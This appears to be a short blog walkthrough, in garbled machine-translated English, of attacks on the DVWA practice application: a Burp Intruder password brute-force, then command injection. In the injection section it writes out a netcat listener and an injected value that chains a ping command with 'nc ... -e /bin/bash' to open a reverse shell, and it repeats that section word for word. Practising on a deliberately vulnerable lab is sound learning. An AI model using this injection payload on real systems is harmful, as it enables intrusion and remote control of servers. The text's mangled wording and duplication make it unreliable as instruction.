1. included in dvwa click on the first option brute force
2. locate and click the selection and choose an action searching intruder sent interruder
3. appear clear display and search options add 2x
4. select payload
5 adds the name of the password that will be used as a candidate in use
6. anggka different looking then skewer her that the results of these password
2
Blocking TECHNICAL EXECUTION BY coment
1. Sign of the terminal to ping invite interaction
with street = nc -lvp 4444
2. open wab to use the ip survived the enemy is already known
example 192.168.56.1.111
and / dvwa enter
enter a password and name
3. pilik low scurity and type the ip address us and printah advanced example
localshots; nc 192.168.1.104 4444 -e / bin / bash
waiting for the process and we have entered the enemy live server is controlled via terminals
1. Sign of the terminal to ping invite interaction
with street = nc -lvp 4444
2. open wab to use the ip survived the enemy is already known
example 192.168.56.1.111
and / dvwa enter
enter a password and name
3. pilik low scurity and type the ip address us and printah advanced example
localshots; nc 192.168.1.104 4444 -e / bin / bash
waiting for the process and we have entered the enemy live server is controlled via terminals



Tidak ada komentar:
Posting Komentar